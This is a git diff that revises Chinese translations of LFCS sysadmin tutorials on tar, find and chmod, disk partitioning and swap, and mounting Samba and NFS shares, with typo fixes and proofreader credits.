-Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高一点。另外,xz是最新的压缩工具,压缩率最好。xz 具有最佳压缩率的代价是:完成压缩操作花费最多时间,压缩过程中占有较多系统资源。
+|长选项|缩写|描述|
+|-----|:--:|:--|
+| -directory dir| C| 执行归档操作前,先转到指定目录|
+| -same-permissions| p| 保持原始的文件权限|
+| -verbose| v| 列出所有的读取或提取的文件。但这个标识符与 -list 一起使用的时候,还会显示出文件大小、属主和时间戳的信息|
+| -verify| W| 写入存档后进行校验|
+| -exclude file| | 不把指定文件包含在内|
+| -exclude=pattern| X| 以PATTERN模式排除文件|
+| -gzip 或 -gunzip| z| 通过gzip压缩归档|
+| -bzip2| j| 通过bzip2压缩归档|
+| -xz| J| 通过xz压缩归档|
+
+
+Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高一点。另外,xz 是最新的压缩工具,压缩率最好。xz 具有最佳压缩率的代价是:完成压缩操作花费最多时间,压缩过程中占有较多系统资源。
通常,通过这些工具压缩的 tar 文件相应的具有 .gz、.bz2 或 .xz的扩展名。在下列的例子中,我们使用 file1、file2、file3、file4 和 file5 进行演示。
**通过 gzip、bzip2 和 xz 压缩归档**
-归档当前工作目录的所有文件,并以 gzip、bzip2 和 xz 压缩刚刚的归档文件(请注意,用正则表达式来指定那些文件应该归档——这是为了防止归档工具包前一步生成的文件打包进来)。
+归档当前工作目录的所有文件,并以 gzip、bzip2 和 xz 压缩刚刚的归档文件(请注意,用正则表达式来指定哪些文件应该归档——这是为了防止将归档工具包前一步生成的文件打包进来)。
# tar czf myfiles.tar.gz file[0-9]
# tar cjf myfiles.tar.bz2 file[0-9]
@@ -167,7 +74,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Compress Multiple Files Using tar](http://www.tecmint.com/wp-content/uploads/2014/10/Compress-Multiple-Files.png)
-压缩多个文件
+*压缩多个文件*
**列举 tarball 中的内容和更新/追加文件到归档文件中**
@@ -177,7 +84,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Check Files in tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/List-Archive-Content.png)
-列举归档文件中的内容
+*列举归档文件中的内容*
运行一下任意一条命令:
@@ -206,19 +113,19 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
假设你现在需要备份用户的家目录。一个有经验的系统管理员会选择忽略所有视频和音频文件再备份(也可能是公司规定)。
-可能你最先想到的方法是在备份是时候,忽略扩展名为 .mp3 和 .mp4(或者其他格式)的文件。但如果你有些自作聪明的用户将扩展名改为 .txt 或者 .bkp,那你的方法就不灵了。为了发现并排除音频或者视频文件,你需要先检查文件类型。以下 shell 脚本可以代你完成类型检查:
+可能你最先想到的方法是在备份的时候,忽略扩展名为 .mp3 和 .mp4(或者其他格式)的文件。但如果你有些自作聪明的用户将扩展名改为 .txt 或者 .bkp,那你的方法就不灵了。为了发现并排除音频或者视频文件,你需要先检查文件类型。以下 shell 脚本可以代你完成类型检查:
#!/bin/bash
# 把需要进行备份的目录传递给 $1 参数.
DIR=$1
- #排除文件类型中包含了 mpeg 字符串的文件,然后创建 tarball 并进行压缩。
+ # 排除文件类型中包含了 mpeg 字符串的文件,然后创建 tarball 并进行压缩。
# -若文件类型中包含 mpeg 字符串, $?(最后执行的命令的退出状态)返回 0,然后文件名被定向到排除选项。否则返回 1。
# -若 $? 等于 0,该文件从需要备份文件的列表排除。
tar X <(for i in $DIR/*; do file $i | grep -i mpeg; if [ $? -eq 0 ]; then echo $i; fi;done) -cjf backupfile.tar.bz2 $DIR/*
![Exclude Files in tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/Exclude-Files-in-Tar.png)
-排除文件进行备份
+*排除文件进行备份*
**使用 tar 保持文件的原有权限进行恢复**
@@ -228,7 +135,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Restore Files from tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-tar-Backup-Files.png)
-从归档文件中恢复
+*从归档文件中恢复*
**扩展阅读:**
@@ -243,31 +150,31 @@ find 命令用于递归搜索目录树中包含指定字符的文件和目录,
#### 基本语法:####
-# find [需搜索的目录] [表达式]
+ # find [需搜索的目录] [表达式]
**通过文件大小递归搜索文件**
-以下命令会搜索当前目录(.)及其下两层子目录(-maxdepth 3,包含当前目录及往下两层的子目录)大于 2 MB(-size +2M)的所有文件(-f)。
+以下命令会搜索当前目录(.)及其下两层子目录(-maxdepth 3,包含当前目录及往下两层的子目录)中大于 2 MB(-size +2M)的所有文件(-f)。
# find . -maxdepth 3 -type f -size +2M
![Find Files by Size in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Files-Based-on-Size.png)
-
-通过文件大小搜索文件
+*
+通过文件大小搜索文件*
**搜索符合一定规则的文件并将其删除**
-有时候,777 权限的文件通常为外部攻击者打开便利之门。不管是以何种方式,让所有人都可以对文件进行任意操作都是不安全的。对此,我们采取一个相对激进的方法——删除这些文件(‘{ }’用来“聚集”搜索的结果)。
+有时候,777 权限的文件通常为外部攻击者打开便利之门。不管是以何种方式,让所有人都可以对文件进行任意操作都是不安全的。对此,我们采取一个相对激进的方法——删除这些文件('{}' + 用来“聚集”搜索的结果)。
# find /home/user -perm 777 -exec rm '{}' +
![Find all 777 Permission Files](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Files-with-777-Permission.png)
-搜索 777 权限的文件
+*搜索 777 权限的文件*
**按访问时间和修改时间搜索文件**
-搜索 /etc 目录下访问时间(-atime)或修改时间(-mtime)大于或小于 6 个月或者刚好 6 个月的配置文件。
+搜索 /etc 目录下访问时间(-atime)或修改时间(-mtime)大于(+180)或小于(-180) 6 个月或者刚好(180) 6 个月的配置文件。
按照下面例子对命令进行修改:
@@ -275,7 +182,7 @@ find 命令用于递归搜索目录树中包含指定字符的文件和目录,
![Find Files by Modification Time](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Modified-Files.png)
-按修改时间搜索文件
+*按修改时间搜索文件*
- 扩展阅读: [35 Practical Examples of Linux ‘find’ Command][3]
@@ -301,11 +208,11 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
八进制数值可以从二进制数值进行等值转换,通过下列方法来计算文件属主、同组用户和其他用户权限对应的二进制数值:
-一个确定权限的二进制数值表现为 2 的幂(r=2^2,w=2^1,x=2^0),当权限省缺时,二进制数值为 0。如下:
+一个确定权限的二进制数值表现为 2 的幂(r=2\^2,w=2\^1,x=2\^0),当权限省缺时,二进制数值为 0。如下:
![Linux File Permissions](http://www.tecmint.com/wp-content/uploads/2014/10/File-Permissions.png)
-文件权限
+*文件权限*
使用八进制数值设置上图的文件权限,请输入:
@@ -313,7 +220,6 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
通过 u、g 和 o 分别代表用户、同组用户和其他用户,然后你也可以使用权限表达式来单独对用户设置文件的权限模式。也可以通过 a 代表所有用户,然后设置文件权限。通过 + 号或者 - 号相应的赋予或移除文件权限。
-
**为所有用户撤销一个 shell 脚本的执行权限**
正如之前解释的那样,我们可以通过 - 号为需要移除权限的属主、同组用户、其他用户或者所有用户去掉指定的文件权限。下面命令中的短横线(-)可以理解为:移除(-)所有用户(a)的 backup.sh 文件执行权限(x)。
@@ -324,11 +230,13 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
当我们使用 3 位八进制数值为文件设置权限的时候,第一位数字代表属主权限,第二位数字代表同组用户权限,第三位数字代表其他用户的权限:
-- 属主:(r=2^2 + w=2^1 + x=2^0 = 7)
-- 同组用户:(r=2^2 + w=2^1 + x=2^0 = 7)
-- 其他用户:(r=2^2 + w=0 + x=0 = 4),
+- 属主:(r=2\^2 + w=2\^1 + x=2\^0 = 7)
+- 同组用户:(r=2\^2 + w=2\^1 + x=2\^0 = 7)
+- 其他用户:(r=2\^2 + w=0 + x=0 = 4)
- # chmod 774 myfile
+命令如下:
+
+ # chmod 774 myfile
随着练习时间的推移,你会知道何种情况下使用哪种方式来更改文件的权限模式的效果最好。
@@ -336,7 +244,7 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
![Linux File Listing](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-File-Listing.png)
-列举 Linux 文件
+*列举 Linux 文件*
通过 chown 命令可以对文件的归属权进行更改,可以同时或者分开更改属主和属组。其基本语法为:
@@ -367,9 +275,9 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
先行感谢!
参考链接
-- [About the LFCS][4]
-- [Why get a Linux Foundation Certification?][5]
-- [Register for the LFCS exam][6]
+- [关于 LFCS][4]
+- [为什么需要 Linux 基金会认证?][5]
+- [注册 LFCS 考试][6]
--------------------------------------------------------------------------------
@@ -377,7 +285,7 @@ via: http://www.tecmint.com/compress-files-and-finding-files-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md b/published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
similarity index 82%
rename from translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
rename to published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
index 987ea4a7f8..77bd84087c 100644
--- a/translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
+++ b/published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
@@ -1,13 +1,11 @@
-GHLandy Translated
-
-LFCS 系列第四讲:分区存储设备、格式化文件系统和配置交换分区
-
+LFCS 系列第四讲:对存储设备分区、格式化文件系统和配置交换分区
================================================================================
+
去年八月份,Linux 基金会发起了 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,给所有系统管理员一个展现自己的机会。通过基础考试后,他们可以胜任在 Linux 上的整体运维工作:包括系统支持、一流水平的诊断和监控以及在必要之时向其他支持团队提交帮助请求等。
![Linux Foundation Certified Sysadmin – Part 4](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-4.png)
-LFCS 系列第四讲
+*LFCS 系列第四讲*
需要注意的是,Linux 基金会认证是非常严格的,通过与否完全要看个人能力。通过在线链接,你可以随时随地参加 Linux 基金会认证考试。所以,你再也不用到考试中心了,只需要不断提高自己的专业技能和经验就可去参加考试了。
@@ -16,13 +14,13 @@ LFCS 系列第四讲
注:youtube 视频
-本讲是《十套教程》系列中的第四讲。在本讲中,我们将涵盖分区存储设备、格式化文件系统和配置交换分区等内容,这些都是 LFCS 认证中的必备知识。
+本讲是系列教程中的第四讲。在本讲中,我们将涵盖对存储设备进行分区、格式化文件系统和配置交换分区等内容,这些都是 LFCS 认证中的必备知识。
-### 分区存储设备 ###
+### 对存储设备分区 ###
分区是一种将单独的硬盘分成一个或多个区的手段。一个分区只是硬盘的一部分,我们可以认为这部分是独立的磁盘,里边包含一个单一类型的文件系统。分区表则是将硬盘上这些分区与分区标识符联系起来的索引。
-在 Linux 中,IBM PC 兼容系统里边用于管理传统 MBR(最新到2009年)分区的工具是 fdisk。对于 GPT(2010年至今)分区,我们使用 gdisk。这两个工具都可以通过程序名后面加上设备名称(如 /dev/sdb)进行调用。
+在 Linux 上,IBM PC 兼容系统里边用于管理传统 MBR(用到2009年)分区的工具是 fdisk。对于 GPT(2010年至今)分区,我们使用 gdisk。这两个工具都可以通过程序名后面加上设备名称(如 /dev/sdb)进行调用。
#### 使用 fdisk 管理 MBR 分区 ####
@@ -34,17 +32,17 @@ LFCS 系列第四讲
![fdisk Help Menu](http://www.tecmint.com/wp-content/uploads/2014/10/fdisk-help.png)
-fdisk 帮助菜单
+*fdisk 帮助菜单*
上图中,使用频率最高的选项已高亮显示。你可以随时按下 “p” 显示分区表。
![Check Partition Table in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Show-Partition-Table.png)
-显示分区表
+*显示分区表*
Id 列显示由 fdisk 分配给每个分区的分区类型(分区 id)。一个分区类型代表一种文件系统的标识符,简单来说,包括该分区上数据的访问方法。
-请注意,每个分区类型的全面都全面讲解将超出了本教程的范围——本系列教材主要专注于 LFCS 测试,因能力为主。
+请注意,每个分区类型的全面讲解将超出了本教程的范围——本系列教材主要专注于 LFCS 测试,以考试为主。
**下面列出一些 fdisk 常用选项:**
@@ -58,25 +56,25 @@ Id 列显示由 fdisk 分配给每个分区的分区类型(分区 id)。一
![fdisk Command Options](http://www.tecmint.com/wp-content/uploads/2014/10/fdisk-options.png)
-fdisk 命令选项
+*fdisk 命令选项*
按下 “n” 后接着按下 “p” 会创建新一个主分区。最后,你可以使用所有的默认值(这将占用所有的可用空间),或者像下面一样自定义分区大小。
![Create New Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-New-Partition.png)
-创建新分区
+*创建新分区*
若 fdisk 分配的分区 Id 并不是我们想用的,可以按下 “t” 来更改。
![Change Partition Name in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Partition-Name.png)
-更改分区类型
+*更改分区类型*
全部设置好分区后,按下 “w” 将更改保存到硬盘分区表上。
![Save Partition Changes](http://www.tecmint.com/wp-content/uploads/2014/10/Save-Partition-Changes.png)
-保存分区更改
+*保存分区更改*
#### 使用 gdisk 管理 GPT 分区 ####
@@ -88,7 +86,7 @@ fdisk 命令选项
![Create GPT Partitions in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-GPT-Partitions.png)
-创建 GPT 分区
+*创建 GPT 分区*
使用 GPT 分区方案,我们可以在同一个硬盘上创建最多 128 个分区,单个分区最大以 PB 为单位,而 MBR 分区方案最大的只能 2TB。
@@ -96,7 +94,7 @@ fdisk 命令选项
![gdisk Command Options](http://www.tecmint.com/wp-content/uploads/2014/10/gdisk-options.png)
-gdisk 命令选项
+*gdisk 命令选项*
### 格式化文件系统 ###
@@ -106,14 +104,14 @@ gdisk 命令选项
![Check Filesystems Type in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Filesystems.png)
-检查文件系统类型
+*检查文件系统类型*
选择文件系统取决于你的需求。你应该考虑到每个文件系统的优缺点以及其特点。选择文件系统需要看的两个重要属性:
- 日志支持,允许从系统崩溃事件中快速恢复数据。
-- 安全增强式 Linux(SELinux)支持,按照项目 wiki 所说,“安全增强式 Linux 允许用户和管理员更好的把握访问控制权限”。
+- 安全增强式 Linux(SELinux)支持,按照项目 wiki 所说,“安全增强式 Linux 允许用户和管理员更好的控制访问控制权限”。
-在接下来的例子中,我们通过 mkfs 在 /dev/sdb1上创建 ext4 文件系统(支持日志和 SELinux),标卷为 Tecmint。mkfs 基本语法如下:
+在接下来的例子中,我们通过 mkfs 在 /dev/sdb1 上创建 ext4 文件系统(支持日志和 SELinux),标卷为 Tecmint。mkfs 基本语法如下:
# mkfs -t [filesystem] -L [label] device
或者
@@ -121,7 +119,7 @@ gdisk 命令选项
![Create ext4 Filesystems in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-ext4-Filesystems.png)
-创建 ext4 文件系统
+*创建 ext4 文件系统*
### 创建并启用交换分区 ###
@@ -129,7 +127,7 @@ gdisk 命令选项
下面列出选择交换分区大小的经验法则:
-物理内存不高于 2GB 时,取两倍物理内存大小即可;物理内存在 2GB 以上时,取一倍物理内存大小即可;并且所取大小应该大于 32MB。
+> 物理内存不高于 2GB 时,取两倍物理内存大小即可;物理内存在 2GB 以上时,取一倍物理内存大小即可;并且所取大小应该大于 32MB。
所以,如果:
@@ -142,7 +140,7 @@ M为物理内存大小,S 为交换分区大小,单位 GB,那么:
记住,这只是基本的经验。对于作为系统管理员的你,才是决定是否使用交换分区及其大小的关键。
-要配置交换分区,首先要划分一个常规分区,大小像我们之前演示的那样来选取。然后添加以下条目到 /etc/fstab 文件中(其中的X要更改为对应的 b 或 c)。
+要配置交换分区,首先要划分一个常规分区,大小像我们之前演示的那样来选取。然后添加以下条目到 /etc/fstab 文件中(其中的 X 要更改为对应的 b 或 c)。
/dev/sdX1 swap swap sw 0 0
@@ -163,15 +161,15 @@ M为物理内存大小,S 为交换分区大小,单位 GB,那么:
![Create-Swap-Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-Swap-Partition.png)
-创建交换分区
+*创建交换分区*
![Add Swap Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Swap-Partition.png)
-启用交换分区
+*启用交换分区*
### 结论 ###
-在你的系统管理员之路上,创建分区(包括交换分区)和格式化文件系统是非常重要的一部。我希望本文中所给出的技巧指导你到达你的管理员目标。随时在本讲评论区中发表你的技巧和想法,一起为社区做贡献。
+在你的系统管理员之路上,创建分区(包括交换分区)和格式化文件系统是非常重要的一步。我希望本文中所给出的技巧指导你到达你的管理员目标。随时在本讲评论区中发表你的技巧和想法,一起为社区做贡献。
参考链接
@@ -185,7 +183,7 @@ via: http://www.tecmint.com/create-partitions-and-filesystems-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md b/published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
similarity index 76%
rename from translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
rename to published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
index 1551f4de0c..50344e5da0 100644
--- a/translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
+++ b/published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
@@ -1,22 +1,18 @@
-GHLandy Translated
-
LFCS 系列第五讲:如何在 Linux 中挂载/卸载本地文件系统和网络文件系统(Samba 和 NFS)
-
================================================================================
-Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中间系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时上游团队请求支持的决策能力。
+Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中间系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时向上游团队请求支持的决策能力。
![Linux Foundation Certified Sysadmin – Part 5](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-5.png)
-LFCS 系列第五讲
+*LFCS 系列第五讲*
请看以下视频,这里边介绍了 Linux 基金会认证程序。
注:youtube 视频
-本讲是《十套教程》系列中的第三讲,在这一讲里边,我们会解释如何在 Linux 中挂载/卸载本地和网络文件系统。这些都是 LFCS 认证中的必备知识。
-
+本讲是系列教程中的第五讲,在这一讲里边,我们会解释如何在 Linux 中挂载/卸载本地和网络文件系统。这些都是 LFCS 认证中的必备知识。
### 挂载文件系统 ###
@@ -26,20 +22,19 @@ LFCS 系列第五讲
换句话说,管理存储设备的第一步就是把设备关联到文件系统树。要完成这一步,通常可以这样:用 mount 命令来进行临时挂载(用完的时候,使用 umount 命令来卸载),或者通过编辑 /etc/fstab 文件之后重启系统来永久性挂载,这样每次开机都会进行挂载。
-
不带任何选项的 mount 命令,可以显示当前已挂载的文件系统。
# mount
![Check Mounted Filesystem in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/check-mounted-filesystems.png)
-检查已挂载的文件系统
+*检查已挂载的文件系统*
另外,mount 命令通常用来挂载文件系统。其基本语法如下:
# mount -t type device dir -o options
-该命令会指引内核在设备上找到的文件系统(如已格式化为指定类型的文件系统)挂载到指定目录。像这样的形式,mount 命令不会再到 /etc/fstab 文件中进行确认。
+该命令会指引内核将在设备上找到的文件系统(如已格式化为指定类型的文件系统)挂载到指定目录。像这样的形式,mount 命令不会再到 /etc/fstab 文件中进行确认。
除非像下面,挂载指定的目录或者设备:
@@ -59,20 +54,17 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
读作:
-设备 dev/mapper/debian-home 的格式为 ext4,挂载在 /home 下,并且有以下挂载选项: rw,relatime,user_xattr,barrier=1,data=ordered。
+设备 dev/mapper/debian-home 挂载在 /home 下,它被格式化为 ext4,并且有以下挂载选项: rw,relatime,user_xattr,barrier=1,data=ordered。
**mount 命令选项**
下面列出 mount 命令的常用选项
-
-- async:运许在将要挂载的文件系统上进行异步 I/O 操作
-- auto:标志文件系统通过 mount -a 命令挂载,与 noauto 相反。
-
-- defaults:该选项为 async,auto,dev,exec,nouser,rw,suid 的一个别名。注意,多个选项必须由逗号隔开并且中间没有空格。倘若你不小心在两个选项中间输入了一个空格,mount 命令会把后边的字符解释为另一个参数。
+- async:允许在将要挂载的文件系统上进行异步 I/O 操作
+- auto:标示该文件系统通过 mount -a 命令挂载,与 noauto 相反。
+- defaults:该选项相当于 `async,auto,dev,exec,nouser,rw,suid` 的组合。注意,多个选项必须由逗号隔开并且中间没有空格。倘若你不小心在两个选项中间输入了一个空格,mount 命令会把后边的字符解释为另一个参数。
- loop:将镜像文件(如 .iso 文件)挂载为 loop 设备。该选项可以用来模拟显示光盘中的文件内容。
- noexec:阻止该文件系统中可执行文件的执行。与 exec 选项相反。
-
- nouser:阻止任何用户(除 root 用户外) 挂载或卸载文件系统。与 user 选项相反。
- remount:重新挂载文件系统。
- ro:只读模式挂载。
@@ -91,7 +83,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Device in Read Write Mode](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Device-Read-Write.png)
-可读写模式挂载设备
+*可读写模式挂载设备*
**以默认模式挂载设备**
@@ -102,26 +94,25 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Device in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Device.png)
-挂载设备
+*挂载设备*
在这个例子中,我们发现写入文件和命令都完美执行了。
### 卸载设备 ###
-使用 umount 命令卸载设备,意味着将所有的“在使用”数据全部写入到文件系统了,然后可以安全移除文件系统。请注意,倘若你移除一个没有事先正确卸载的文件系统,就会有造成设备损坏和数据丢失的风险。
+使用 umount 命令卸载设备,意味着将所有的“在使用”数据全部写入到文件系统,然后可以安全移除文件系统。请注意,倘若你移除一个没有事先正确卸载的设备,就会有造成设备损坏和数据丢失的风险。
-也就是说,你必须设备的盘符或者挂载点中退出,才能卸载设备。换言之,当前工作目录不能是需要卸载设备的挂载点。否则,系统将返回设备繁忙的提示信息。
+也就是说,你必须“离开”设备的块设备描述符或者挂载点,才能卸载设备。换言之,你的当前工作目录不能是需要卸载设备的挂载点。否则,系统将返回设备繁忙的提示信息。
![Unmount Device in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Unmount-Device.png)
-卸载设备
+*卸载设备*
离开需卸载设备的挂载点最简单的方法就是,运行不带任何选项的 cd 命令,这样会回到当前用户的家目录。
-
### 挂载常见的网络文件系统 ###
-最常用的两种网络文件系统是 SMB(Server Message Block,服务器消息块)和 NFS(Network File System,网络文件系统)。如果你只向类 Unix 客户端提供共享,用 NFS 就可以了,如果是向 Windows 和其他类 Unix客户端提供共享服务,就需要用到 Samba 了。
+最常用的两种网络文件系统是 SMB(Server Message Block,服务器消息块)和 NFS(Network File System,网络文件系统)。如果你只向类 Unix 客户端提供共享,用 NFS 就可以了,如果是向 Windows 和其他类 Unix 客户端提供共享服务,就需要用到 Samba 了。
扩展阅读
@@ -130,13 +121,13 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
下面的例子中,假设 Samba 和 NFS 已经在地址为 192.168.0.10 的服务器上架设好了(请注意,架设 NFS 服务器也是 LFCS 考试中需要考核的能力,我们会在后边中提到)。
-
#### 在 Linux 中挂载 Samba 共享 ####
第一步:在 Red Hat 以 Debian 系发行版中安装 samba-client、samba-common 和 cifs-utils 软件包,如下:
# yum update && yum install samba-client samba-common cifs-utils
# aptitude update && aptitude install samba-client samba-common cifs-utils
+
然后运行下列命令,查看服务器上可用的 Samba 共享。
# smbclient -L 192.168.0.10
@@ -145,7 +136,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Samba Share in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Samba-Share.png)
-挂载 Samba 共享
+*挂载 Samba 共享*
上图中,已经对可以挂载到我们本地系统上的共享进行高亮显示。你只需要与一个远程服务器上的合法用户名及密码就可以访问共享了。
@@ -164,7 +155,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Password Protect Samba Share](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Password-Protect-Samba-Share.png)
-挂载有密码保护的 Samba 共享
+*挂载有密码保护的 Samba 共享*
#### 在 Linux 系统中挂载 NFS 共享 ####
@@ -185,7 +176,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount NFS Share in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-NFS-Share.png)
-挂载 NFS 共享
+*挂载 NFS 共享*
### 永久性挂载文件系统 ###
@@ -197,13 +188,12 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
其中:
-- : 第一个字段指定挂载的设备。大多数发行版本都通过分区的标卷(label)或者 UUID 来指定。这样做可以避免分区号改变是带来的错误。
-- : 第二字段指定挂载点。
-- :文件系统的类型代码与 mount 命令挂载文件系统时使用的类型代码是一样的。通过 auto 类型代码可以让内核自动检测文件系统,这对于可移动设备来说非常方便。注意,该选项可能不是对所有文件系统可用。
-- : 一个(或多个)挂载选项。
-- : 你可能把这个字段设置为 0(否则设置为 1),使得系统启动时禁用 dump 工具(dump 程序曾经是一个常用的备份工具,但现在越来越少用了)对文件系统进行备份。
-
-- : 这个字段指定启动系统是是否通过 fsck 来检查文件系统的完整性。0 表示 fsck 不对文件系统进行检查。数字越大,优先级越低。因此,根分区(/)最可能使用数字 1,其他所有需要检查的分区则是以数字 2.
+- \: 第一个字段指定挂载的设备。大多数发行版本都通过分区的标卷(label)或者 UUID 来指定。这样做可以避免分区号改变时带来的错误。
+- \: 第二个字段指定挂载点。
+- \ :文件系统的类型代码与 mount 命令挂载文件系统时使用的类型代码是一样的。通过 auto 类型代码可以让内核自动检测文件系统,这对于可移动设备来说非常方便。注意,该选项可能不是对所有文件系统可用。
+- \: 一个(或多个)挂载选项。
+- \: 你可能把这个字段设置为 0(否则设置为 1),使得系统启动时禁用 dump 工具(dump 程序曾经是一个常用的备份工具,但现在越来越少用了)对文件系统进行备份。
+- \: 这个字段指定启动系统是是否通过 fsck 来检查文件系统的完整性。0 表示 fsck 不对文件系统进行检查。数字越大,优先级越低。因此,根分区(/)最可能使用数字 1,其他所有需要检查的分区则是以数字 2.
**Mount 命令例示**
@@ -211,7 +201,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
LABEL=TECMINT /mnt ext4 rw,noexec 0 0
-2. 若你想在系统启动时挂载 DVD 光驱中的内容,添加已下语句。
+2. 若你想在系统启动时挂载 DVD 光驱中的内容,添加以下语句。
/dev/sr0 /media/cdrom0 iso9660 ro,user,noauto 0 0
@@ -219,7 +209,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
### 总结 ###
-可以放心,在命令行中挂载/卸载本地和网络文件系统将是你作为系统管理员的日常责任的一部分。同时,你需要掌握 /etc/fstab 文件的编写。希望本文对你有帮助。随时在下边发表评论(或者提问),并分享本文到你的朋友圈。
+不用怀疑,在命令行中挂载/卸载本地和网络文件系统将是你作为系统管理员的日常责任的一部分。同时,你需要掌握 /etc/fstab 文件的编写。希望本文对你有帮助。随时在下边发表评论(或者提问),并分享本文到你的朋友圈。
参考链接
@@ -234,7 +224,7 @@ via: http://www.tecmint.com/mount-filesystem-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md b/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md
new file mode 100644
index 0000000000..ff480868ac
--- /dev/null
+++ b/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md
@@ -0,0 +1,283 @@
+LFCS 系列第六讲:组装分区为RAID设备——创建和管理系统备份
+=========================================================
+Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中级系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时向上游团队请求支持的决策能力。
